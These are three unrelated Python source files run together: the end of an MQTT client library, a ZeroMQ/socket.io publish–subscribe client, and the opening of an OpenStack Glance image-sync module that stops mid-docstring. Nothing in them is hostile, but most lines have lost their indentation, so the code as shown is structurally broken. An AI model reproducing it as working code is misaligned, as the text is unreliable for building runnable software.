self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, 0)
self._in_callback = False
self._callback_mutex.release()
if self._ssl:
self._ssl.close()
self._ssl = None
if self._sock:
self._sock.close()
self._sock = None
return MQTT_ERR_SUCCESS
self._out_packet_mutex.acquire()
if len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
else:
self._current_out_packet = None
self._out_packet_mutex.release()
else:
pass # FIXME
self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
return MQTT_ERR_SUCCESS
def _easy_log(self, level, buf):
if self.on_log:
self.on_log(self, self._userdata, level, buf)
def _check_keepalive(self):
now = time.time()
self._msgtime_mutex.acquire()
last_msg_out = self._last_msg_out
last_msg_in = self._last_msg_in
self._msgtime_mutex.release()
if (self._sock is not None or self._ssl is not None) and (now - last_msg_out >= self._keepalive or now - last_msg_in >= self._keepalive):
if self._state == mqtt_cs_connected and self._ping_t == 0:
self._send_pingreq()
self._msgtime_mutex.acquire()
self._last_msg_out = now
self._last_msg_in = now
self._msgtime_mutex.release()
else:
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
rc = 1
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
def _mid_generate(self):
self._last_mid = self._last_mid + 1
if self._last_mid == 65536:
self._last_mid = 1
return self._last_mid
def _topic_wildcard_len_check(self, topic):
# Search for + or # in a topic. Return MQTT_ERR_INVAL if found.
# Also returns MQTT_ERR_INVAL if the topic string is too long.
# Returns MQTT_ERR_SUCCESS if everything is fine.
if '+' in topic or '#' in topic or len(topic) == 0 or len(topic) > 65535:
return MQTT_ERR_INVAL
else:
return MQTT_ERR_SUCCESS
def _send_pingreq(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGREQ")
rc = self._send_simple_command(PINGREQ)
if rc == MQTT_ERR_SUCCESS:
self._ping_t = time.time()
return rc
def _send_pingresp(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGRESP")
return self._send_simple_command(PINGRESP)
def _send_puback(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBACK (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBACK, mid, False)
def _send_pubcomp(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBCOMP (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBCOMP, mid, False)
def _pack_remaining_length(self, packet, remaining_length):
remaining_bytes = []
while True:
byte = remaining_length % 128
remaining_length = remaining_length // 128
# If there are more digits to encode, set the top bit of this digit
if remaining_length > 0:
byte = byte | 0x80
remaining_bytes.append(byte)
packet.extend(struct.pack("!B", byte))
if remaining_length == 0:
# FIXME - this doesn't deal with incorrectly large payloads
return packet
def _pack_str16(self, packet, data):
if sys.version_info[0] < 3:
if isinstance(data, bytearray):
packet.extend(struct.pack("!H", len(data)))
packet.extend(data)
elif isinstance(data, str):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
elif isinstance(data, unicode):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
else:
raise TypeError
else:
if isinstance(data, bytearray) or isinstance(data, bytes):
packet.extend(struct.pack("!H", len(data)))
packet.extend(data)
elif isinstance(data, str):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
else:
raise TypeError
def _send_publish(self, mid, topic, payload=None, qos=0, retain=False, dup=False):
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
utopic = topic.encode('utf-8')
command = PUBLISH | ((dup&0x1)<<3) | (qos<<1) | retain
packet = bytearray()
packet.extend(struct.pack("!B", command))
if payload is None:
remaining_length = 2+len(utopic)
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBLISH (d"+str(dup)+", q"+str(qos)+", r"+str(int(retain))+", m"+str(mid)+", '"+topic+"' (NULL payload)")
else:
if isinstance(payload, str):
upayload = payload.encode('utf-8')
payloadlen = len(upayload)
elif isinstance(payload, bytearray):
payloadlen = len(payload)
elif isinstance(payload, unicode):
upayload = payload.encode('utf-8')
payloadlen = len(upayload)
remaining_length = 2+len(utopic) + payloadlen
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBLISH (d"+str(dup)+", q"+str(qos)+", r"+str(int(retain))+", m"+str(mid)+", '"+topic+"', ... ("+str(payloadlen)+" bytes)")
if qos > 0:
# For message id
remaining_length = remaining_length + 2
self._pack_remaining_length(packet, remaining_length)
self._pack_str16(packet, topic)
if qos > 0:
# For message id
packet.extend(struct.pack("!H", mid))
if payload is not None:
if isinstance(payload, str):
pack_format = str(payloadlen) + "s"
packet.extend(struct.pack(pack_format, upayload))
elif isinstance(payload, bytearray):
packet.extend(payload)
elif isinstance(payload, unicode):
pack_format = str(payloadlen) + "s"
packet.extend(struct.pack(pack_format, upayload))
else:
raise TypeError('payload must be a string, unicode or a bytearray.')
return self._packet_queue(PUBLISH, packet, mid, qos)
def _send_pubrec(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREC (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBREC, mid, False)
def _send_pubrel(self, mid, dup=False):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREL (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBREL|2, mid, dup)
def _send_command_with_mid(self, command, mid, dup):
# For PUBACK, PUBCOMP, PUBREC, and PUBREL
if dup:
command = command | 8
remaining_length = 2
packet = struct.pack('!BBH', command, remaining_length, mid)
return self._packet_queue(command, packet, mid, 1)
def _send_simple_command(self, command):
# For DISCONNECT, PINGREQ and PINGRESP
remaining_length = 0
packet = struct.pack('!BB', command, remaining_length)
return self._packet_queue(command, packet, 0, 0)
def _send_connect(self, keepalive, clean_session):
if self._protocol == MQTTv31:
protocol = PROTOCOL_NAMEv31
proto_ver = 3
else:
protocol = PROTOCOL_NAMEv311
proto_ver = 4
remaining_length = 2+len(protocol) + 1+1+2 + 2+len(self._client_id)
connect_flags = 0
if clean_session:
connect_flags = connect_flags | 0x02
if self._will:
if self._will_payload is not None:
remaining_length = remaining_length + 2+len(self._will_topic) + 2+len(self._will_payload)
else:
remaining_length = remaining_length + 2+len(self._will_topic) + 2
connect_flags = connect_flags | 0x04 | ((self._will_qos&0x03) << 3) | ((self._will_retain&0x01) << 5)
if self._username:
remaining_length = remaining_length + 2+len(self._username)
connect_flags = connect_flags | 0x80
if self._password:
connect_flags = connect_flags | 0x40
remaining_length = remaining_length + 2+len(self._password)
command = CONNECT
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
packet.extend(struct.pack("!H"+str(len(protocol))+"sBBH", len(protocol), protocol, proto_ver, connect_flags, keepalive))
self._pack_str16(packet, self._client_id)
if self._will:
self._pack_str16(packet, self._will_topic)
if self._will_payload is None or len(self._will_payload) == 0:
packet.extend(struct.pack("!H", 0))
else:
self._pack_str16(packet, self._will_payload)
if self._username:
self._pack_str16(packet, self._username)
if self._password:
self._pack_str16(packet, self._password)
self._keepalive = keepalive
return self._packet_queue(command, packet, 0, 0)
def _send_disconnect(self):
return self._send_simple_command(DISCONNECT)
def _send_subscribe(self, dup, topics):
remaining_length = 2
for t in topics:
remaining_length = remaining_length + 2+len(t[0])+1
command = SUBSCRIBE | (dup<<3) | (1<<1)
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t[0])
packet.extend(struct.pack("B", t[1]))
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _send_unsubscribe(self, dup, topics):
remaining_length = 2
for t in topics:
remaining_length = remaining_length + 2+len(t)
command = UNSUBSCRIBE | (dup<<3) | (1<<1)
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t)
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _message_retry_check_actual(self, messages, mutex):
mutex.acquire()
now = time.time()
for m in messages:
if m.timestamp + self._message_retry < now:
if m.state == mqtt_ms_wait_for_puback or m.state == mqtt_ms_wait_for_pubrec:
m.timestamp = now
m.dup = True
self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
elif m.state == mqtt_ms_wait_for_pubrel:
m.timestamp = now
m.dup = True
self._send_pubrec(m.mid)
elif m.state == mqtt_ms_wait_for_pubcomp:
m.timestamp = now
m.dup = True
self._send_pubrel(m.mid, True)
mutex.release()
def _message_retry_check(self):
self._message_retry_check_actual(self._out_messages, self._out_message_mutex)
self._message_retry_check_actual(self._in_messages, self._in_message_mutex)
def _messages_reconnect_reset_out(self):
self._out_message_mutex.acquire()
self._inflight_messages = 0
for m in self._out_messages:
m.timestamp = 0
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
if m.qos == 0:
m.state = mqtt_ms_publish
elif m.qos == 1:
#self._inflight_messages = self._inflight_messages + 1
if m.state == mqtt_ms_wait_for_puback:
m.dup = True
m.state = mqtt_ms_publish
elif m.qos == 2:
#self._inflight_messages = self._inflight_messages + 1
if m.state == mqtt_ms_wait_for_pubcomp:
m.state = mqtt_ms_resend_pubrel
m.dup = True
else:
if m.state == mqtt_ms_wait_for_pubrec:
m.dup = True
m.state = mqtt_ms_publish
else:
m.state = mqtt_ms_queued
self._out_message_mutex.release()
def _messages_reconnect_reset_in(self):
self._in_message_mutex.acquire()
for m in self._in_messages:
m.timestamp = 0
if m.qos != 2:
self._in_messages.pop(self._in_messages.index(m))
else:
# Preserve current state
pass
self._in_message_mutex.release()
def _messages_reconnect_reset(self):
self._messages_reconnect_reset_out()
self._messages_reconnect_reset_in()
def _packet_queue(self, command, packet, mid, qos):
mpkt = dict(
command = command,
mid = mid,
qos = qos,
pos = 0,
to_process = len(packet),
packet = packet)
self._out_packet_mutex.acquire()
self._out_packet.append(mpkt)
if self._current_out_packet_mutex.acquire(False):
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
self._current_out_packet_mutex.release()
self._out_packet_mutex.release()
# Write a single byte to sockpairW (connected to sockpairR) to break
# out of select() if in threaded mode.
try:
self._sockpairW.send(sockpair_data)
except socket.error as err:
if err.errno != EAGAIN:
raise
if not self._in_callback and self._thread is None:
return self.loop_write()
else:
return MQTT_ERR_SUCCESS
def _packet_handle(self):
cmd = self._in_packet['command']&0xF0
if cmd == PINGREQ:
return self._handle_pingreq()
elif cmd == PINGRESP:
return self._handle_pingresp()
elif cmd == PUBACK:
return self._handle_pubackcomp("PUBACK")
elif cmd == PUBCOMP:
return self._handle_pubackcomp("PUBCOMP")
elif cmd == PUBLISH:
return self._handle_publish()
elif cmd == PUBREC:
return self._handle_pubrec()
elif cmd == PUBREL:
return self._handle_pubrel()
elif cmd == CONNACK:
return self._handle_connack()
elif cmd == SUBACK:
return self._handle_suback()
elif cmd == UNSUBACK:
return self._handle_unsuback()
else:
# If we don't recognise the command, return an error straight away.
self._easy_log(MQTT_LOG_ERR, "Error: Unrecognised command "+str(cmd))
return MQTT_ERR_PROTOCOL
def _handle_pingreq(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
self._easy_log(MQTT_LOG_DEBUG, "Received PINGREQ")
return self._send_pingresp()
def _handle_pingresp(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
# No longer waiting for a PINGRESP.
self._ping_t = 0
self._easy_log(MQTT_LOG_DEBUG, "Received PINGRESP")
return MQTT_ERR_SUCCESS
def _handle_connack(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
if len(self._in_packet['packet']) != 2:
return MQTT_ERR_PROTOCOL
(flags, result) = struct.unpack("!BB", self._in_packet['packet'])
if result == CONNACK_REFUSED_PROTOCOL_VERSION and self._protocol == MQTTv311:
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK ("+str(flags)+", "+str(result)+"), attempting downgrade to MQTT v3.1.")
# Downgrade to MQTT v3.1
self._protocol = MQTTv31
return self.reconnect()
if result == 0:
self._state = mqtt_cs_connected
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK ("+str(flags)+", "+str(result)+")")
self._callback_mutex.acquire()
if self.on_connect:
self._in_callback = True
if sys.version_info[0] < 3:
argcount = self.on_connect.func_code.co_argcount
else:
argcount = self.on_connect.__code__.co_argcount
if argcount == 3:
self.on_connect(self, self._userdata, result)
else:
flags_dict = dict()
flags_dict['session present'] = flags & 0x01
self.on_connect(self, self._userdata, flags_dict, result)
self._in_callback = False
self._callback_mutex.release()
# Start counting for stable connection
self._backoffCore.startStableConnectionTimer()
if result == 0:
rc = 0
self._out_message_mutex.acquire()
for m in self._out_messages:
m.timestamp = time.time()
if m.state == mqtt_ms_queued:
self.loop_write() # Process outgoing messages that have just been queued up
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
if m.qos == 0:
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.qos == 1:
if m.state == mqtt_ms_publish:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_puback
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.qos == 2:
if m.state == mqtt_ms_publish:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_pubrec
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.state == mqtt_ms_resend_pubrel:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_pubcomp
self._in_callback = True # Don't call loop_write after _send_pubrel()
rc = self._send_pubrel(m.mid, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
self.loop_write() # Process outgoing messages that have just been queued up
self._out_message_mutex.release()
return rc
elif result > 0 and result < 6:
return MQTT_ERR_CONN_REFUSED
else:
return MQTT_ERR_PROTOCOL
def _handle_suback(self):
self._easy_log(MQTT_LOG_DEBUG, "Received SUBACK")
pack_format = "!H" + str(len(self._in_packet['packet'])-2) + 's'
(mid, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = "!" + "B"*len(packet)
granted_qos = struct.unpack(pack_format, packet)
self._callback_mutex.acquire()
if self.on_subscribe:
self._in_callback = True
self.on_subscribe(self, self._userdata, mid, granted_qos)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_publish(self):
rc = 0
header = self._in_packet['command']
message = MQTTMessage()
message.dup = (header & 0x08)>>3
message.qos = (header & 0x06)>>1
message.retain = (header & 0x01)
pack_format = "!H" + str(len(self._in_packet['packet'])-2) + 's'
(slen, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = '!' + str(slen) + 's' + str(len(packet)-slen) + 's'
(message.topic, packet) = struct.unpack(pack_format, packet)
if len(message.topic) == 0:
return MQTT_ERR_PROTOCOL
if sys.version_info[0] >= 3:
message.topic = message.topic.decode('utf-8')
if message.qos > 0:
pack_format = "!H" + str(len(packet)-2) + 's'
(message.mid, packet) = struct.unpack(pack_format, packet)
message.payload = packet
self._easy_log(
MQTT_LOG_DEBUG,
"Received PUBLISH (d"+str(message.dup)+
", q"+str(message.qos)+", r"+str(message.retain)+
", m"+str(message.mid)+", '"+message.topic+
"', ... ("+str(len(message.payload))+" bytes)")
message.timestamp = time.time()
if message.qos == 0:
self._handle_on_message(message)
return MQTT_ERR_SUCCESS
elif message.qos == 1:
rc = self._send_puback(message.mid)
self._handle_on_message(message)
return rc
elif message.qos == 2:
rc = self._send_pubrec(message.mid)
message.state = mqtt_ms_wait_for_pubrel
self._in_message_mutex.acquire()
self._in_messages.append(message)
self._in_message_mutex.release()
return rc
else:
return MQTT_ERR_PROTOCOL
def _handle_pubrel(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
if len(self._in_packet['packet']) != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREL (Mid: "+str(mid)+")")
self._in_message_mutex.acquire()
for i in range(len(self._in_messages)):
if self._in_messages[i].mid == mid:
# Only pass the message on if we have removed it from the queue - this
# prevents multiple callbacks for the same message.
self._handle_on_message(self._in_messages[i])
self._in_messages.pop(i)
self._inflight_messages = self._inflight_messages - 1
if self._max_inflight_messages > 0:
self._out_message_mutex.acquire()
rc = self._update_inflight()
self._out_message_mutex.release()
if rc != MQTT_ERR_SUCCESS:
self._in_message_mutex.release()
return rc
self._in_message_mutex.release()
return self._send_pubcomp(mid)
self._in_message_mutex.release()
return MQTT_ERR_SUCCESS
def _update_inflight(self):
        # Don't lock message_mutex here
for m in self._out_messages:
if self._inflight_messages < self._max_inflight_messages:
if m.qos > 0 and m.state == mqtt_ms_queued:
self._inflight_messages = self._inflight_messages + 1
if m.qos == 1:
m.state = mqtt_ms_wait_for_puback
elif m.qos == 2:
m.state = mqtt_ms_wait_for_pubrec
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
if rc != 0:
return rc
else:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def _handle_pubrec(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREC (Mid: "+str(mid)+")")
self._out_message_mutex.acquire()
for m in self._out_messages:
if m.mid == mid:
m.state = mqtt_ms_wait_for_pubcomp
m.timestamp = time.time()
self._out_message_mutex.release()
return self._send_pubrel(mid, False)
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_unsuback(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received UNSUBACK (Mid: "+str(mid)+")")
self._callback_mutex.acquire()
if self.on_unsubscribe:
self._in_callback = True
self.on_unsubscribe(self, self._userdata, mid)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_pubackcomp(self, cmd):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received "+cmd+" (Mid: "+str(mid)+")")
self._out_message_mutex.acquire()
for i in range(len(self._out_messages)):
try:
if self._out_messages[i].mid == mid:
# Only inform the client the message has been sent once.
self._callback_mutex.acquire()
if self.on_publish:
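                        # Temporarily release the out-message lock while the user callback
                        # runs (e.g. so the callback may publish without re-entering this
                        # lock); it is re-acquired right after the callback returns.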
self._out_message_mutex.release()
self._in_callback = True
self.on_publish(self, self._userdata, mid)
self._in_callback = False
self._out_message_mutex.acquire()
self._callback_mutex.release()
self._out_messages.pop(i)
self._inflight_messages = self._inflight_messages - 1
if self._max_inflight_messages > 0:
rc = self._update_inflight()
if rc != MQTT_ERR_SUCCESS:
self._out_message_mutex.release()
return rc
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
except IndexError:
# Have removed item so i>count.
# Not really an error.
pass
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_on_message(self, message):
self._callback_mutex.acquire()
matched = False
for t in self.on_message_filtered:
if topic_matches_sub(t[0], message.topic):
self._in_callback = True
t[1](self, self._userdata, message)
self._in_callback = False
matched = True
        if not matched and self.on_message:
self._in_callback = True
self.on_message(self, self._userdata, message)
self._in_callback = False
self._callback_mutex.release()
def _thread_main(self):
self._state_mutex.acquire()
if self._state == mqtt_cs_connect_async:
self._state_mutex.release()
self.reconnect()
else:
self._state_mutex.release()
self.loop_forever()
def _host_matches_cert(self, host, cert_host):
if cert_host[0:2] == "*.":
if cert_host.count("*") != 1:
return False
host_match = host.split(".", 1)[1]
cert_match = cert_host.split(".", 1)[1]
if host_match == cert_match:
return True
else:
return False
else:
if host == cert_host:
return True
else:
return False
def _tls_match_hostname(self):
try:
cert = self._ssl.getpeercert()
except AttributeError:
# the getpeercert can throw Attribute error: object has no attribute 'peer_certificate'
# Don't let that crash the whole client. See also: http://bugs.python.org/issue13721
raise ssl.SSLError('Not connected')
san = cert.get('subjectAltName')
if san:
have_san_dns = False
for (key, value) in san:
if key == 'DNS':
have_san_dns = True
                    if self._host_matches_cert(self._host.lower(), value.lower()):
return
if key == 'IP Address':
have_san_dns = True
if value.lower() == self._host.lower():
return
if have_san_dns:
# Only check subject if subjectAltName dns not found.
raise ssl.SSLError('Certificate subject does not match remote hostname.')
subject = cert.get('subject')
if subject:
for ((key, value),) in subject:
if key == 'commonName':
                    if self._host_matches_cert(self._host.lower(), value.lower()):
return
raise ssl.SSLError('Certificate subject does not match remote hostname.')
# Compatibility class for easy porting from mosquitto.py.
class Mosquitto(Client):
def __init__(self, client_id="", clean_session=True, userdata=None):
super(Mosquitto, self).__init__(client_id, clean_session, userdata)
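# Minimal usage sketch for the client above, assuming a broker is reachable at
# localhost:1883; the host, port, topic and client id below are placeholder values.
if __name__ == "__main__":
    def _print_message(client, userdata, msg):
        # Echo every message received on the subscribed topic.
        print("%s -> %r" % (msg.topic, msg.payload))
    _client = Client("example-client")
    _client.on_message = _print_message
    _client.connect("localhost", 1883, 60)
    _client.subscribe("example/topic", 0)
    _client.publish("example/topic", "hello", 1)
    _client.loop_forever()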
|
client.py
|
import json
import os
import threading
import uuid
import weakref
from urllib.parse import urljoin
import msgpack
import portpicker
import socketio
import zmq
from loguru import logger
from .pack import serialize_data
from .watcher import Watcher
from ..utils import (
DEFAULT_HWM,
DEFAULT_ZMQ_IO_THREADS,
INPROC_INFO_ADDR,
get_config_path,
ping_server,
)
ENDPOINT_TYPE_MAP = {
zmq.PUB: "zmq_pub",
zmq.PUSH: "zmq_push",
}
class PublishManager:
def __init__(self, ctx, sio_client, server_config):
self.ctx = ctx
self.sio_client = sio_client
self.local_ip = server_config["ip"]
self.root_dir = os.path.join(
server_config["root_dir"], f"{os.getpid()}-socket-{str(uuid.uuid4())}"
)
os.makedirs(self.root_dir, exist_ok=True)
self.socks = {}
self.endpoints = []
self.packer = msgpack.Packer(autoreset=False)
self.packer_lock = threading.Lock()
def close(self, linger=-1):
for sock in self.socks.values():
sock.close(linger=linger)
def register_all(self):
self.sio_client.emit("register", self.endpoints)
def _create_socket(self, sock_type, topic, ipc=True, conflate=False):
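        # Lazily create and bind one socket per (sock_type, topic, ipc, conflate)
        # key, then advertise the new endpoint to the server via register_all().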
key = (sock_type, topic, ipc, conflate)
if key in self.socks:
return
if ipc:
path = os.path.join(self.root_dir, f"{os.getpid()}-{topic}-{sock_type}-{conflate}")
addr = f"ipc://{path}"
else:
port = portpicker.pick_unused_port()
addr = f"tcp://{self.local_ip}:{port}"
        self.socks[key] = self.ctx.socket(sock_type)
        self.socks[key].set_hwm(DEFAULT_HWM)
        if conflate:
            # Socket options generally only apply to subsequent binds/connects,
            # so set CONFLATE before bind().
            self.socks[key].setsockopt(zmq.CONFLATE, 1)
        self.socks[key].bind(addr)
item = {
"type": ENDPOINT_TYPE_MAP[sock_type],
"addr": addr,
"topic": topic,
"host": self.local_ip,
}
self.endpoints.append(item)
self.register_all()
def send(
self,
sock_type,
topic,
data,
ipc=True,
noblock=False,
conflate=False,
compression=None,
**compression_args,
):
assert sock_type in [zmq.PUB, zmq.PUSH]
self._create_socket(sock_type, topic, ipc, conflate)
key = (sock_type, topic, ipc, conflate)
with self.packer_lock:
with serialize_data(
data, compression, self.packer, **compression_args
) as packed_data:
flags = zmq.NOBLOCK if noblock else 0
self.socks[key].send(packed_data, flags=flags)
class Client:
def __init__(self, server_name):
self.ctx = zmq.Context(DEFAULT_ZMQ_IO_THREADS)
self.endpoint_info = {}
self.watchers = weakref.WeakSet()
config_path = get_config_path(server_name)
assert os.path.exists(config_path)
with open(config_path, "r") as f:
self.server_config = json.load(f)
        # check connection
        pid = self.server_config["pid"]
        url = self.server_config["url"]
        try:
            ping_server(urljoin(url, "/echo"), pid)
        except BaseException:
            logger.exception(
                f"perwez server cannot be accessed. name {server_name}, url {url}, pid {pid}"
            )
            raise
self.sio_client = socketio.Client()
self.sio_client.on("connect", self._on_connect)
self.sio_client.on("update", self._on_info_updated)
self.pub_manager = PublishManager(self.ctx, self.sio_client, self.server_config)
init_ev = threading.Event()
self._info_sock = None
self._info_lock = threading.Lock()
self._sio_thread = threading.Thread(
target=self._sio_poller, args=(init_ev,), daemon=True
)
self._sio_thread.start()
init_ev.wait()
def close(self, linger=-1):
self.pub_manager.close(linger)
if self.sio_client.connected:
self.sio_client.disconnect()
# pylint: disable=protected-access
if self.sio_client._reconnect_task is not None:
self.sio_client._reconnect_abort.set()
# pylint: enable=protected-access
def _sio_poller(self, init_ev):
self._info_sock = self.ctx.socket(zmq.PUB)
self._info_sock.setsockopt(zmq.CONFLATE, 1)
self._info_sock.bind(INPROC_INFO_ADDR)
self.sio_client.connect(self.server_config["url"], transports="websocket")
init_ev.set()
self.sio_client.wait()
def _on_connect(self):
self.pub_manager.register_all()
def _on_info_updated(self, endpoints):
new_info = {}
for x in endpoints:
new_info.setdefault(x["topic"], [])
new_info[x["topic"]].append(x)
with self._info_lock:
self.endpoint_info = new_info
self._info_sock.send_json(new_info)
def publish(
self, topic, data, ipc=True, noblock=False, conflate=True, compression=None, **compression_args
):
self.pub_manager.send(
zmq.PUB, topic, data, ipc, noblock, conflate, compression, **compression_args
)
def push(
self, topic, data, ipc=True, noblock=False, conflate=False, compression=None, **compression_args
):
self.pub_manager.send(
zmq.PUSH, topic, data, ipc, noblock, conflate, compression, **compression_args
)
def subscribe(self, topic, conflate):
with self._info_lock:
watcher = Watcher(
self.ctx, topic, conflate, self.endpoint_info.get(topic)
)
self.watchers.add(watcher)
return watcher
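# Minimal usage sketch, assuming a perwez server named "demo" is already running
# and has written its config file; the server name and topic are placeholders.
if __name__ == "__main__":
    client = Client("demo")
    watcher = client.subscribe("example-topic", conflate=False)
    # Publish a payload; subscribers on this topic receive it through their Watcher.
    client.publish("example-topic", b"hello")
    client.close()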
|
base.py
|
# Copyright (c) 2014 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Jia Dong, HuaWei
import copy
import httplib
import Queue
import threading
import time
import eventlet
from oslo.config import cfg
import six.moves.urllib.parse as urlparse
from glance.common import exception
from glance.openstack.common import jsonutils
from glance.openstack.common import timeutils
import glance.openstack.common.log as logging
from glance.sync import utils as s_utils
from glance.sync.clients import Clients as clients
from glance.sync.store.driver import StoreFactory as s_factory
from glance.sync.store.location import LocationFactory as l_factory
import glance.sync.store.glance_store as glance_store
from glance.sync.task import TaskObject
from glance.sync.task import PeriodicTask
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.import_opt('sync_strategy', 'glance.common.config', group='sync')
CONF.import_opt('task_retry_times', 'glance.common.config', group='sync')
CONF.import_opt('snapshot_timeout', 'glance.common.config', group='sync')
CONF.import_opt('snapshot_sleep_interval', 'glance.common.config',
group='sync')
_IMAGE_LOCS_MAP = {}
def get_copy_location_url(image):
"""
    Choose the best location of an image for sync.
"""
global _IMAGE_LOCS_MAP
image_id = image.id
locations = image.locations
if not locations:
return ''
    # First time: store it in the cache.
    if image_id not in _IMAGE_LOCS_MAP:
_IMAGE_LOCS_MAP[image_id] = {
'locations':
[{'url': locations[0]['url'],
'count': 1,
'is_using':1
}]
}
return locations[0]['url']
else:
recorded_locs = _IMAGE_LOCS_MAP[image_id]['locations']
record_urls = [loc['url'] for loc in recorded_locs]
for location in locations:
            # A new, not-yet-used location: cache it and just return it.
if location['url'] not in record_urls:
recorded_locs.append({
'url': location['url'],
'count':1,
'is_using':1
})
return location['url']
        # Find locations used before but currently not in use.
not_used_locs = [loc for loc in recorded_locs
if not loc['is_using']]
if not_used_locs:
_loc = not_used_locs[0]
_loc['is_using'] = 1
_loc['count'] += 1
return _loc['url']
        # Last case: choose the location with the lowest usage count.
_my_loc = sorted(recorded_locs, key=lambda my_loc: my_loc['count'])[0]
_my_loc['count'] += 1
return _my_loc['url']
def remove_invalid_location(id, url):
"""
    When a sync fails with a location, remove it from the cache.
:param id: the image_id
